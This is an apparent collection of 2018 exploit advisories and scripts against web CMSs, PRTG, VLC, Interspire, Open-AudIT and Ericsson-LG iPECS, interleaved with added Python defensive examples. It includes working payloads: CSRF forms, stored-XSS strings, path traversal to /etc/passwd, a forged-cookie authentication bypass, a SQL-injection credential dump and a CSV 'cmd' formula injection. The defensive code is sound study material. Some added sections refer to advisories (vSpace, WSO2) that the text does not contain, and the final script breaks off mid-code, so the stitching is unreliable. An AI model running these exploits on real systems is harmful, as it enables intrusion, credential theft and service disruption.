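How a request handler should resolve a URL path so that the dot patterns listed above never reach the file system, as an added example in Python 3 (not NComputing's code; the web root, the reverse-proxy log lines and the helper names are constructed). It percent-decodes, treats backslashes as separators, rejects any segment made only of dots, and confirms the normalised result is still under the root; a second function runs the same check over sample log lines so the advisory's URLs can be spotted in traffic.

```python
"""Resolve a requested URL path inside a web root and refuse escapes.

Added example, not part of the vSpace advisory. Pure path logic from
posixpath is used so the code runs offline; WEB_ROOT and SAMPLE_LOG are
constructed for illustration.
"""
import posixpath
import re
from urllib.parse import unquote

WEB_ROOT = "/srv/www/root"  # constructed

# A segment made only of two or more dots (.., ..., ....) is a traversal
# attempt whichever way a lenient server might normalise it.
DOT_ONLY_SEGMENT = re.compile(r"^\.{2,}$")


def safe_resolve(root, request_path):
    """Return the absolute file path for request_path, or None if rejected.

    Steps: percent-decode, treat backslashes as separators, reject dot-only
    segments, then normalise and verify the result stays under root.
    """
    decoded = unquote(request_path).replace("\\", "/")
    for segment in decoded.split("/"):
        if DOT_ONLY_SEGMENT.match(segment):
            return None
    joined = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if joined != root and not joined.startswith(root + "/"):
        return None
    return joined


def extract_path(url):
    """Strip scheme and host from a URL so only the request path remains."""
    return url.split("/", 3)[3] if url.count("/") >= 3 else ""


# Constructed access-log lines of the form a proxy in front of the service
# might record; the traversal paths are the ones listed in the advisory.
SAMPLE_LOG = [
    "GET /index.html 200",
    "GET /.../.../.../.../.../.../.../.../.../windows/win.ini 200",
    "GET /...\\...\\...\\...\\...\\...\\...\\...\\...\\windows\\win.ini 200",
    "GET /..../..../windows/win.ini 200",
    "GET /static/app.js 200",
]


def flag_traversal(log_lines, root=WEB_ROOT):
    """Return the request paths in log_lines that safe_resolve would reject."""
    flagged = []
    for line in log_lines:
        path = line.split()[1]
        if safe_resolve(root, path) is None:
            flagged.append(path)
    return flagged


if __name__ == "__main__":
    for path in flag_traversal(SAMPLE_LOG):
        print("traversal attempt:", path)
```

Rejecting dot-only segments before normalisation matters because posixpath.normpath only understands ".." and would happily keep "..." as an ordinary directory name, which is exactly the ambiguity a lenient server turns into a traversal.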
# Exploit Title: WUZHI CMS 4.1.0 - Cross-Site Request Forgery
# Date: 2018-04-23
# Exploit Author: jiguang (s1@jiguang.in)
# Vendor Homepage: https://github.com/wuzhicms/wuzhicms
# Software Link: https://github.com/wuzhicms/wuzhicms
# Version: 4.1.0
# CVE: CVE-2018-10312
An issue was discovered in WUZHI CMS 4.1.0 (https://github.com/wuzhicms/wuzhicms/issues/132).
There is a CSRF vulnerability that can modify a member's password via index.php?m=member&v=pw_reset.
After the member has logged in, open the exploit page:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/www/index.php?m=member&v=pw_reset" method="POST">
<input type="hidden" name="password" value="yuduo" />
<input type="hidden" name="password2" value="yuduo" />
<input type="hidden" name="submit" value="确 定" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
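The check the pw_reset handler lacks, as an added example in Python 3 (not WUZHI CMS code; the in-memory session store, form field names and site origin are constructed): a per-session synchronizer token is embedded in the legitimate form and compared in constant time on every POST, and a mismatching Origin header is refused before the password is touched. The forged form above carries no token, so it fails either check.

```python
"""Synchronizer-token and Origin check for a state-changing form.

Added example, not WUZHI CMS code. SESSIONS stands in for a real session
store; the token is generated per session, rendered into the genuine
pw_reset form, and verified before any password change.
"""
import hmac
import secrets

SESSIONS = {}  # constructed in-memory session store: session_id -> dict
SITE_ORIGIN = "https://cms.example.test"  # constructed


def new_session():
    """Create a logged-in session with a fresh CSRF token."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"csrf_token": secrets.token_urlsafe(32)}
    return sid


def render_pw_reset_form(sid):
    """The legitimate form carries the session's token as a hidden field."""
    token = SESSIONS[sid]["csrf_token"]
    return ('<form action="/index.php?m=member&v=pw_reset" method="POST">'
            '<input type="hidden" name="csrf_token" value="%s">'
            '<input type="password" name="password">'
            '<input type="password" name="password2">'
            '<input type="submit" value="Submit"></form>' % token)


def pw_reset(sid, form, origin, site=SITE_ORIGIN):
    """Handle a POST; return (ok, reason) and change nothing unless ok."""
    session = SESSIONS.get(sid)
    if session is None:
        return False, "not logged in"
    # Browsers send Origin on cross-site form POSTs; a foreign origin is
    # rejected outright. A missing header falls through to the token check.
    if origin is not None and origin != site:
        return False, "cross-origin request"
    supplied = form.get("csrf_token", "").encode()
    expected = session["csrf_token"].encode()
    if not hmac.compare_digest(supplied, expected):
        return False, "missing or invalid csrf token"
    if form.get("password") != form.get("password2"):
        return False, "passwords differ"
    session["password_changed_to"] = form["password"]
    return True, "password changed"


if __name__ == "__main__":
    sid = new_session()
    forged = {"password": "yuduo", "password2": "yuduo"}
    print(pw_reset(sid, forged, "http://attacker.example"))
```

Checking Origin alone is not enough (older clients and some proxies drop it), and the token alone does not help if it leaks through a reflected-XSS bug, which is why both checks run.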
# Exploit Title: Monstra cms 3.0.4 - Persistent Cross-Site Scripting
# Date: 2018-04-14
# Exploit Author: Wenming Jiang
# Vendor Homepage: https://github.com/monstra-cms/monstra
# Software Link: https://github.com/monstra-cms/monstra
# Version: 3.0.4
# Tested on: php 5.6, apache2.2.29, macos 10.12.6
# CVE :CVE-2018-10109
#Description:
#Monstra CMS 3.0.4 has a stored XSS vulnerability when an attacker has access to the editor role, and enters the payload
#in the content section of a new page in the blog catalog.
#Steps to replicate:
#1. log into the system as an editor role
#2. create a new page in the blog catalog
#3. navigate to the content section
#4. enter payload: <script>alert(document.cookie)</script>
#5. visit http://<your_site>/monstra/blog/<page_name>.php; you will trigger JavaScript execution
#Exploit Code:
<script>alert(document.cookie)</script>
or
<img src=1 onerror=alert(/xss/) >
# Exploit Title: UK Cookie Consent v2.3.9 - Persistent Cross-Site Scripting
# Date: 2018-04-22
# Exploit Author: B0UG
# Vendor Homepage: https://catapultthemes.com/
# Software Link: https://en-gb.wordpress.org/plugins/uk-cookie-consent/#description
# Version: Tested on version 2.3.9 (older versions may also be affected)
# Tested on: WordPress
# Category : Webapps
# CVE: CVE-2018-10310
I. VULNERABILITY
-------------------------
Persistent Cross-Site Scripting
II. BACKGROUND
-------------------------
UK Cookie Consent is a WordPress plugin which has been designed to display cookie consent notifications on a WordPress website.
III. DESCRIPTION
-------------------------
A persistent cross-site scripting vulnerability has been identified in the web interface of the plugin that allows arbitrary HTML/script code to be executed in a victim's web browser.
IV. PROOF OF CONCEPT
-------------------------
1) Access WordPress control panel.
2) Navigate to the 'Pages'.
3) Add a new page and insert the script you wish to inject into the page title.
4) Now navigate to 'Settings' and select 'Cookie Consent'.
5) Now click on the 'Content' tab.
6) Your injected script will now be executed.
V. IMPACT
-------------------------
An attacker can execute malicious code in a victim user's browser to perform various activities such as stealing cookies, session tokens, credentials and personal data amongst others.
VI. SYSTEMS AFFECTED
-------------------------
WordPress websites running "UK Cookie Consent" plugin version 2.3.9 (older versions may also be affected).
VII. REMEDIATION
-------------------------
Update to the latest version available. Implement a web application firewall such as Wordfence.
VIII. DISCLOSURE TIMELINE
-------------------------
April 22, 2018: Vulnerability identified.
April 22, 2018: Informed developer of the vulnerability.
April 23, 2018: Developer acknowledged the vulnerability.
April 23, 2018: Developer issued a security patch.
Special thanks goes to the team at Catapult Themes for their fast response, great understanding and patching the issue.
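The three stored-XSS advisories on this page (WSO2 profile fields and the BPS worker host URL, the Monstra page content, and the UK Cookie Consent page title) share one root cause: stored strings rendered into HTML without context-appropriate encoding. The following added example in Python 3 (not code from any of those projects; the template, field names and payload copies are constructed) places the vulnerable concatenation beside the escaped form, handles the attribute context the WSO2 payload breaks out of, and includes a parser-based audit a reviewer can run over rendered output.

```python
"""Render untrusted stored strings into HTML without letting them execute.

Added example; it is not code from WSO2, Monstra or the UK Cookie Consent
plugin. Profile fields go into text nodes; a stored URL goes into a
double-quoted attribute, where a stray quote is the escape route.
"""
import html
import re
from html.parser import HTMLParser

# Constructed copies of the payloads quoted in the advisories above.
PAYLOADS = [
    "<script>alert(document.cookie)</script>",
    "<img src=1 onerror=alert(/xss/) >",
    '"><img src=x onerror=alert(document.cookie)>',
]

_TEMPLATE = ("<ul><li>Name: {0} {1}</li><li>Username: {2}</li>"
             "<li>Address: {3}</li></ul>")


def render_profile_unsafe(first, last, username, address):
    """The vulnerable pattern: stored values concatenated straight in."""
    return _TEMPLATE.format(first, last, username, address)


def render_profile(first, last, username, address):
    """Escape each field for a text-node context."""
    return _TEMPLATE.format(
        *(html.escape(v, quote=True) for v in (first, last, username, address)))


def render_worker_host(url):
    """Escape a stored URL placed inside a double-quoted attribute.

    quote=True turns the closing quote in the payload into &quot; so the
    attribute cannot be terminated early; non-http(s) schemes are refused.
    """
    if not re.match(r"^https?://", url, re.I):
        url = "about:blank"
    return '<input type="text" name="host" value="{0}">'.format(
        html.escape(url, quote=True))


class _TagAudit(HTMLParser):
    """Collect executable tags and event-handler attributes from markup."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "img", "svg", "iframe"):
            self.findings.append(tag)
        for name, _ in attrs:
            if name.startswith("on"):
                self.findings.append(name)


def audit_markup(rendered):
    """Review check: return the tags/handlers the browser would act on."""
    audit = _TagAudit()
    audit.feed(rendered)
    audit.close()
    return audit.findings


if __name__ == "__main__":
    print(audit_markup(render_profile_unsafe(PAYLOADS[0], "Doe", PAYLOADS[1], "1 Main St")))
    print(audit_markup(render_profile(PAYLOADS[0], "Doe", PAYLOADS[1], "1 Main St")))
```

Note that the escaped output still contains the literal text "onerror=alert(/xss/)"; that is correct, because without a real "<" the browser treats it as text, which is why the audit parses the markup instead of grepping for handler names.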
# Exploit Title: PRTG 18.1.39.1648 - Stack Overflow
# Date: 2018-04-21
# Exploit Author: Lucas "luriel" Carmo
# Vendor Homepage: https://www.paessler.com/prtg
# Software Link: https://www.paessler.com/download/prtg-download
# Version: 18.1.39.1648
# CVE : CVE-2018-10253
# Post Reference: https://medium.com/stolabs/stack-overflow-jewish-napalm-on-prtg-network-monitoring-56609b0804c5
# http://www.roothc.com.br/stack-overflow-prtg-network-monitoring-jewish-napalm/
#!/usr/bin/python
import requests
import sys
import os
import re
import socket
green = "\033[1;32m"
yellow = '\033[1;33m'
normal = '\033[0;0m'
banner = """
██╗███████╗██╗ ██╗██╗███████╗██╗ ██╗ ███╗ ██╗ █████╗ ██████╗ █████╗ ██╗ ███╗ ███╗
██║██╔════╝██║ ██║██║██╔════╝██║ ██║ ████╗ ██║██╔══██╗██╔══██╗██╔══██╗██║ ████╗ ████║
██║█████╗ ██║ █╗ ██║██║███████╗███████║ ██╔██╗ ██║███████║██████╔╝███████║██║ ██╔████╔██║
██ ██║██╔══╝ ██║███╗██║██║╚════██║██╔══██║ ██║╚██╗██║██╔══██║██╔═══╝ ██╔══██║██║ ██║╚██╔╝██║
╚█████╔╝███████╗╚███╔███╔╝██║███████║██║ ██║ ██║ ╚████║██║ ██║██║ ██║ ██║███████╗██║ ╚═╝ ██║
╚════╝ ╚══════╝ ╚══╝╚══╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝
"""
banner2 = """
Author: @Lucas "luriel" Carmo
"""
os.system('clear')
print(green+banner)
print(yellow+banner2)
print(normal)
def check_http(url):
    pattern = re.compile("http://")
    return re.search(pattern, url)

def sanitize_url(url):
    # Prepend a scheme when the user gave a bare host
    if (not check_http(url)):
        return "http://" + url
    return url

def check_server(url):
    r = requests.get(url, timeout=4)
    code = r.status_code
    # The original never returned the status code, so the 404 test in main()
    # compared against None and always passed
    return code

def send_jewish_payload(url):
    payload = {'file': 'addmap.htm'}
    r = requests.post(url, params=payload)

def main():
    try:
        if len(sys.argv) <= 3 and len(sys.argv) >= 2:
            try:
                url = sanitize_url(sys.argv[1])
                print(' [#] LOADING!')
                if (check_server(url) != 404):
                    send_jewish_payload(url)
                else:
                    print(' [!] Server shutdown or not found')
            except requests.exceptions.ConnectionError:
                print(' [~] BOOOOOM! PRTG Server has been exploded!')
            except requests.exceptions.InvalidURL:
                print(' [!] Invalid URL')
            except requests.exceptions.Timeout:
                print(' [!] Connection Timeout\n')
        else:
            print('Example usage: ./'+sys.argv[0]+' http://192.168.0.10/index.htm')
    except KeyboardInterrupt:
        print(' [!] Jewish Napalm Canceled;.....[./]')

if __name__ == '__main__':
    main()
#Title: Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure
#Author: Larry W. Cashdollar
#Date: 2018-03-30
#CVE-ID: CVE-2018-9205
#Download Site: https://www.drupal.org/project/avatar_uploader
#Vendor: https://www.drupal.org/u/robbinzhao
#Vendor Notified: 2018-04-02
#Vendor Contact: https://www.drupal.org/project/avatar_uploader/issues/2957966#comment-12554146
#Advisory: http://www.vapidlabs.com/advisory.php?v=202
#Description: This module uses Simple Ajax Uploader and provides a basic uploader panel; for more effect you can add your own custom JavaScript, such as sliding up the edit link when the user's mouse hovers over the avatar.
#Vulnerability:
#The view.php script contains code to retrieve files, but no code to verify that the user should be able to view them, or to stop them from changing the path to somewhere outside the uploadDir directory:
<?php
$file = $_GET['file'];
echo file_get_contents("uploadDir/$file");
exit;
Exploit Code:
http://example.com/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd
'''
# Exploit Title: Interspire Email Marketer - Remote Admin Authentication Bypass
# Google Dork: intitle:"Control Panel" + emailmarketer
# Date: 4-22-18
# Exploit Author: devcoinfet
# Vendor Homepage: www.interspire.com/emailmarketer
# Software Link: Can't legally provide link but can be found on net
# Version: [6.1.3-6.1.6]
# Tested on: Below 6.1.6
# CVE : CVE-2017-14322
https://security.infoteam.ch/en/blog/posts/narrative-of-an-incident-response-from-compromise-to-the-publication-of-the-weakness.html
https://github.com/joesmithjaffa/CVE-2017-14322
Thanks to the above researchers.
1. Description
It is used like this:
--------------------------
exploit.py url/email-marketer/admin/index.php
2. Proof of Concept
'''
import requests
import sys
from bs4 import BeautifulSoup
from pprint import pprint
def cookie_cutter(url):
    with requests.Session() as s:
        s.get(url)
        r = s.get(url)
        response_regex = r.text
        print("requesting initial Cookie\n")
        print(str(r.headers)+"\n")
        for key, value in s.cookies.items():
            if key and "IEMSESSIONID" in key:
                s.cookies.set('IEM_CookieLogin', "YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D")
                print("Attempting To Poison 2nd request with Forged Cookie\n")
                print("-" * 25)
                r = s.get(url)
                response_regex2 = r.text
                print response_regex2
                print(str(r.headers) + "\n")
                if response_regex != response_regex2:
                    for key, value in s.cookies.items():
                        if "IEMSESSIONID" in key:
                            try:
                                # using session riding from previous cookie we grab the info we want :)
                                bounce_info_grab(url, value)
                                app_info_grab(url, value)
                                privt_info_grab(url, value)
                            except:
                                pass
    return value, r.text

def bounce_info_grab(url, session_to_ride):
    url_grab = url+"?Page=Settings&Tab=2"
    print(url_grab)
    with requests.Session() as s:
        s.get(url_grab)
        s.cookies.set('IEMSESSIONID', session_to_ride)
        r = s.get(url_grab)
        response_regex = r.text
        soup = BeautifulSoup(response_regex, 'html5lib')
        div = soup.find('div', id='div7')
        outfile = open("bounce_report.txt", 'w')
        dataout = """<html><head>Report</head><title>Report</title>
<body>""" + str(div) + """</body></html>"""
        outfile.write(dataout)
        outfile.close()
        for divy in div.contents:
            print(divy)

def app_info_grab(url, session_to_ride):
    url_grab = url+"?Page=Settings&Tab=2"
    print(url_grab)
    with requests.Session() as s:
        s.get(url_grab)
        s.cookies.set('IEMSESSIONID', session_to_ride)
        r = s.get(url_grab)
        response_regex = r.text
        soup = BeautifulSoup(response_regex, 'html5lib')
        div = soup.find('div', id='div1')
        outfile = open("application_settings_report.txt", 'w')
        dataout = """<html><head>Report</head><title>Report</title>
<body>""" + str(div) + """</body></html>"""
        outfile.write(dataout)
        outfile.close()
        for divy in div.contents:
            print(divy)

def privt_info_grab(url, session_to_ride):
    url_grab = url+"?Page=Settings&Tab=2"
    print(url_grab)
    with requests.Session() as s:
        s.get(url_grab)
        s.cookies.set('IEMSESSIONID', session_to_ride)
        r = s.get(url_grab)
        response_regex = r.text
        soup = BeautifulSoup(response_regex, 'html5lib')
        div = soup.find('div', id='div8')
        outfile = open("privtlbl_settings_report.txt", 'w')
        dataout = """<html><head>Report</head><title>Report</title>
<body>""" + str(div) + """</body></html>"""
        outfile.write(dataout)
        outfile.close()
        for divy in div.contents:
            print(divy)

def main():
    url = sys.argv[1]
    print "Evaluating Target:" + url + """ For CVE-2017-14322""" + "\n"
    print "-" * 25
    try:
        session_rider_value, content = cookie_cutter(url)
        print "Session Has Been Generated Entering Internal Data Dumping Routine" + "\n"
        print "-" * 25
        print "Magic Cookie Generated Modify Existing IEMSESSIONID Value In browser With Below Value "
        print "-" * 25
        print session_rider_value + "\n"
        print "-" * 25
    except:
        print "Target Is Not Vulnerable"
        pass

main()
'''
When running this, if it is successful, check for 3 files in the exploit's directory containing crucial internal configs in HTML format.
Do not use this for bad; just don't do it, please.
3. Solution:
Update to version 6.1.6 at least
http://www.interspire.com/emailmarketer
'''
"""
VLC Media Player/Kodi/PopcornTime 'Red Chimera' < 2.2.5 Memory Corruption (PoC)
Author: SivertPL (kroppoloe@protonmail.ch)
CVE: CVE-2017-8311
Infamous VLC/Kodi/PopcornTime subtitle attack in libsubtitle_plugin.dll.
This is the Proof of Concept of the reverse engineered heap corruption vulnerability affecting JacoSUB parsing in VLC/Kodi/PopcornTime.
The crash is exploitable, but hard to exploit because of various environmental constraints such as threading/mitigations/scriptless.
I want to join a research team.
"""
"""
ModLoad: 00000000`71660000 00000000`716a2000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libmp4_plugin.dll
ModLoad: 00000000`71630000 00000000`71651000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libavi_plugin.dll
ModLoad: 00000000`71610000 00000000`7162e000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libasf_plugin.dll
ModLoad: 00000000`71600000 00000000`7160d000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libdemux_cdg_plugin.dll
ModLoad: 00000000`715e0000 00000000`715fd000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libvobsub_plugin.dll
ModLoad: 00000000`715d0000 00000000`715de000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libdemux_stl_plugin.dll
ModLoad: 00000000`715b0000 00000000`715cf000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libsubtitle_plugin.dll
core demux error: option sub-original-fps does not exist
(33c.d10): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libsubtitle_plugin.dll -
libsubtitle_plugin+0x44de:
715b44de 881f mov byte ptr [edi],bl ds:002b:1b9fb000=??
0:012:x86> g
(33c.d10): Access violation - code c0000005 (!!! second chance !!!)
wow64!Wow64NotifyDebugger+0x1d:
00000000`754ac9f1 654c8b1c2530000000 mov r11,qword ptr gs:[30h] gs:00000000`00000030=????????????????
"""
import os
import struct
import sys
import argparse
overwrite_len = 1025  # renamed from `len` so the builtin is not shadowed

def main(argv):
    global overwrite_len
    parser = argparse.ArgumentParser()
    parser.add_argument("filename", help="Name of the movie file w/o extension, for generating payload")
    parser.add_argument("--length", help="Heap overwrite length (default 1025, may be bigger)", type=int)
    args = parser.parse_args(argv)
    if args.length:
        overwrite_len = args.length
    print "[+] Generating file %s.jss with overwrite size of %d" % (args.filename, overwrite_len)
    write(args.filename, overwrite_len)

def write(name, length):
    # JacoSUB subtitle file; the \C directive followed by a NUL and the filler is what the demuxer mishandles
    subtitles = open("%s.jss" % name, "w+")
    subtitles.write("0:00:02.00 0:00:04.00 VL red chimera..\n")
    subtitles.write("0:00:04.00 0:00:05.00 vm attack")
    subtitles.write("\\C")
    subtitles.write(struct.pack('B', 0))
    subtitles.write('A' * length)
    subtitles.close()
    print "[+] Done!"

if __name__ == "__main__":
    main(sys.argv[1:])
# Exploit Title: Monstra CMS 3.0.4 allows remote attackers to delete a folder via a GET request
# Date: 2018-03-26
# Exploit Author: Wenming Jiang
# Vendor Homepage: https://github.com/monstra-cms/monstra
# Software Link: https://github.com/monstra-cms/monstra
# Version: 3.0.4
# Tested on: macos 10.12.6, php 5.6, apache2.2.29
# CVE: CVE-2018-9038
Description:
Monstra CMS 3.0.4 allows remote attackers to delete a folder via an admin/index.php?id=filesmanager&delete_dir=./&path=uploads/ request.
Steps to Reproduce:
1. Log in as a user with page editing permissions.
2. Request http://your_site/admin/index.php?id=filesmanager&delete_dir=./&path=uploads
3. The uploads folder will be deleted.
Poc code:
GET /monstra/admin/index.php?id=filesmanager&delete_dir=./&path=uploads/&token=008708df48237172f6fe2d173dc30529eac132de HTTP/1.1
Host: localhost:8000
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.10 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost:8000/monstra/admin/index.php?id=filesmanager&path=uploads/
Accept-Language: zh,zh-CN;q=0.9,en;q=0.8,zh-TW;q=0.7
Cookie: SQLiteManager_currentLangue=2; PHPSESSID=882dd1e203c979cedba4524f8107eca3; _ga=GA1.1.1742657188.1524382699; _gid=GA1.1.918663288.1524382699
Connection: close
Vulnerability Type:
Insecure Permissions
Expected Behavior:
deleted uploads folder
Possible Solutions:
Strictly filter the delete_dir parameter and replace './' with '_/'
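Both the avatar_uploader view.php bug above and this delete_dir case come down to the same missing check: the user-supplied path is never confirmed to resolve inside the directory the handler is meant to serve, and a delete handler is additionally never stopped from removing its own root. The following is an added Python example, not code from either project, of such a containment guard; the function and variable names are constructed, and it is exercised with the two request values quoted in these advisories.

```python
import os
import ntpath
import posixpath
import shutil
import tempfile

# Constructed example (not avatar_uploader or Monstra code): confine a
# user-controlled path to a base directory before reading or deleting.

class UnsafePathError(ValueError):
    """Raised when a user-controlled path leaves, or equals, its base directory."""

def resolve_within(base_dir, user_path, allow_base=False):
    """Return the absolute path of user_path under base_dir, or raise.

    Rejects empty paths, NUL bytes, absolute paths, anything that resolves
    outside base_dir, and (unless allow_base) base_dir itself, which is what
    delete_dir=./ resolves to in the Monstra request above.
    """
    if not user_path:
        raise UnsafePathError("empty path")
    if "\x00" in user_path:
        raise UnsafePathError("NUL byte in path")
    normalized = user_path.replace("\\", "/")  # backslashes are separators on Windows hosts
    if posixpath.isabs(normalized) or ntpath.isabs(normalized):
        raise UnsafePathError("absolute paths are not allowed")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, normalized))
    # commonpath is component-aware: /srv/uploads does not "contain" /srv/uploads2
    # the way a plain string-prefix check would claim.
    if os.path.commonpath([base, target]) != base:
        raise UnsafePathError("path escapes base directory: %r" % user_path)
    if target == base and not allow_base:
        raise UnsafePathError("path resolves to the base directory itself")
    return target

def check_download(upload_dir, file_param):
    """Guard for a view.php-style file read (the Drupal case)."""
    return resolve_within(upload_dir, file_param)

def check_delete_dir(files_root, path_param, delete_dir_param):
    """Guard for a filesmanager-style delete (the Monstra case): path_param is
    the directory being browsed, delete_dir_param the entry to remove."""
    browse = resolve_within(files_root, path_param, allow_base=True)
    return resolve_within(browse, delete_dir_param)

def is_rejected(func, *args):
    """True when func(*args) raises UnsafePathError."""
    try:
        func(*args)
    except UnsafePathError:
        return True
    return False

def demo():
    """Run the two advisories' request values through the guards in a scratch tree."""
    root = tempfile.mkdtemp()
    try:
        uploads = os.path.join(root, "uploads")
        os.makedirs(os.path.join(uploads, "photos"))
        real_uploads = os.path.realpath(uploads)
        return {
            "drupal_traversal_rejected": is_rejected(
                check_download, uploads, "../../../../../../../../../../../etc/passwd"),
            "drupal_plain_file_ok": check_download(uploads, "avatar.png")
                == os.path.join(real_uploads, "avatar.png"),
            "monstra_delete_root_rejected": is_rejected(check_delete_dir, root, "uploads/", "./"),
            "monstra_subdir_ok": check_delete_dir(root, "uploads/", "photos")
                == os.path.join(real_uploads, "photos"),
            "absolute_rejected": is_rejected(check_download, uploads, "/etc/passwd"),
        }
    finally:
        shutil.rmtree(root, ignore_errors=True)

if __name__ == "__main__":
    for name, ok in sorted(demo().items()):
        print("%-32s %s" % (name, "PASS" if ok else "FAIL"))
```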
Hi Guys,
#######################################
# Exploit Title: Open-AudIT 2.1 - CSV Macro Injection Vulnerability
# Google Dork: N/A
# Date: 21-04-2018
#######################################
# Exploit Author: Sureshbabu Narvaneni
#######################################
# Author Blog : http://nullnews.in
# Vendor Homepage: https://opmantek.com
# Software Link: https://www.open-audit.org/downloads.php
# Affected Version: 2.1
# Category: WebApps
# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686
# CVE : CVE-2018-9137
#######################################
1. Vendor Description:
Open-AudIT intelligently scans an organization’s network and stores the
configurations of the discovered devices.
A powerful reporting framework enables information such as software
licensing, configuration changes, non-authorized devices, capacity
utilization and hardware warranty status to be extracted and explored.
Open-AudIT Enterprise comes with additional features including Business
Dashboards, Report filtering, Scheduled discovery, Scheduled Reports and
Maps.
2. Technical Description:
CSV injection (aka Excel Macro Injection or Formula Injection) exists in
the export feature of Open-AudIT before 2.2 via a value that is
mishandled in a CSV export.
3. Proof of Concept:
Log in, navigate to any field that has an export feature and
create an entry containing @SUM(1+1)*cmd|' /C calc'!A0.
When a user logs in and exports the data, the CSV
formula is executed and a calculator pops up on their machine.
4. Solution:
Update to latest version
https://www.open-audit.org/downloads.php
# -*- coding: utf-8 -*-
# Exploit Title: Ericsson-LG iPECS NMS - Cleartext Cred. Dump
# Vendor Notification: 03-03-2018 - No response
# Initial CVE: 04-04-2018
# Disclosure: 21-04-2018
# Exploit Author: Berk Cem Göksel
# Contact: twitter.com/berkcgoksel || bgoksel.com
# Vendor Homepage: http://www.ipecs.com/
# Version: A.1Ac and possibly earlier
# Tested on: Windows 2008 R2 x64
# CVE-2018-9245: Multiple SQL injections
# CVE-2018-10285: Incorrect access control
# CVE-2018-10286: Sensitive information disclosure
#--------Description--------#
#
#
# The Ericsson-LG iPECS NMS version A.1Ac and possibly earlier disclose sensitive
# information such as cleartext database and NMS login credentials, use incorrect
# access control mechanisms, are vulnerable to MiTM attacks and are prone to
# SQL injection attacks on multiple parameters.
#
# This script dumps some sensitive information.
#
#
# Why use it?
#
# Normally, you can bypass the login through the SQLi but will get "kicked out".
# Thankfully, we can leverage this to extract the actual admin credentials for
# the web app. In order to do this, we must first dump the database
# credentials in cleartext.
#
#
# Usage = python cred_dump.py IP_address port
# Example = python cred_dump.py 192.168.1.35 80
from sys import argv
import sys
import os
import time
import requests
import re
if len(argv) != 3:
    print "The script takes two mandatory arguments."
    print "\nExample usage: python cred_dump.py 192.168.1.35 80"
    sys.exit("Exiting...")
arg,IP,port=argv
#Log in through SQLi. Otherwise the next POST request is rejected.
sqli_path = "/nms/php/module/main/main_login.php"
sqli_url = "http://" + IP + ":" + port + sqli_path
sqli_cookies = {"mainTab_selectedChild": "sysinfoTab"}
sqli_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://192.168.1.55/index.html", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded"}
sqli_data={"id": "1", "passwd": "1' or 1=1--"}
r = requests.post(sqli_url, headers=sqli_headers, cookies=sqli_cookies, data=sqli_data)
print(r.status_code, r.reason)
time.sleep(1)
#Thanks to incorrect access control we can
#dump cleartext database credentials
dump_path = "/nms/php/module/main/main_start.php"
dump_url = "http://" + IP + ":" + port + dump_path
nms_cookie = {"mainTab_selectedChild": "sysinfoTab"}
nms_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://192.168.1.55/nms/index.html", "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}
nms_data={"command": "nms_start", "client_id": "20"}
r2 = requests.post(dump_url, headers=nms_headers, cookies=nms_cookie, data=nms_data)
print(r2.status_code, r2.reason)
db_cred_dump = r2.content
time.sleep(1)
#Extract db user and db pass from the dump
m = re.search(r"db_user:'(.*)'.*db_pwd:'([^']*)", db_cred_dump)
if m is not None:
    postgre_db_user = m.group(1)
    postgre_db_pwd = m.group(2)
else:
    print "Something went wrong parsing the credentials. Check the dump manually."
    # Save the raw response so it can be inspected, then stop: the original
    # fell through here and raised NameError on the undefined variables below
    open("ipecsnms_dump.txt", "w").write(db_cred_dump)
    sys.exit("Exiting...")
client_id = "2" #Doesn't really matter
user_id = "10" #Doesn't matter either
db_user = postgre_db_user # This does matter
db_pwd = postgre_db_pwd # So does this
#Use db user and password to extract admin credentials for the NMS
users_path = "/nms/php/module/init/module_init.php"
users_url = "http://" + IP + ":" + port + users_path
users_cookies = {"mainTab_selectedChild": "sysinfoTab"}
